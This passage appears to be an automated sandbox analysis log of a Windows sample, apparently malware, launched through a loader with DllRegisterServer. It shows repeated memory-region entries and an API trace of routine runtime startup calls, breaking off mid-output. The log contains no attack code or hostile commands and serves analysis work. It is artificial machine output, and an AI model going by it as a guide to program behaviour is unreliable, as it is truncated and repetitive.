0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6046 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6047 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6048 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6049 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6050 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6051 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6052 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6053 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6054 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6055 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6056 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6057 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6058 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6059 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6060 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6061 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6062 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6063 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6068 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6069 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6070 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6071 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6072 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6073 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6074 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6075 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6076 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6082 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6083 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6084 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6085 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6086 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6087 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6088 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6089 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6090 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6091 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6092 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6093 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6094 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6095 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6096 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6097 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6098 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6099 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6100 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6101 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6102 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6103 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6104 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6105 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6106 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6107 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6108 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6109 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6110 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6111 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6112 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6113 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6114 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6115 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6116 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6117 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6118 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6119 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6120 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6121 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6122 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6123 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6124 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6125 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 6126 start_va = 0x630000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Thread: id = 9 os_tid = 0x69c [0075.966] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0075.967] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0075.967] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0075.967] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0075.967] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0075.968] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0075.968] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0075.968] GetProcessHeap () returned 0x440000 [0075.969] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0075.969] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0075.969] GetLastError () returned 0x7e [0075.969] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0075.969] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0075.969] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3c8) returned 0x44c320 [0075.969] SetLastError (dwErrCode=0x7e) [0075.969] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1200) returned 0x453470 [0075.971] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0075.971] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0075.971] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0075.971] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0075.971] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=DllRegisterServer" [0075.971] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=DllRegisterServer" [0075.972] GetACP () returned 0x4e4 [0075.972] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x228) returned 0x445380 [0075.972] IsValidCodePage (CodePage=0x4e4) returned 1 [0075.972] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0075.972] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0075.972] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0075.972] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0075.972] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0075.972] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0075.972] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0075.972] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0075.972] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0075.972] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0075.972] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0075.972] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0075.972] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0075.973] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0075.973] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0075.973] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0075.973] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 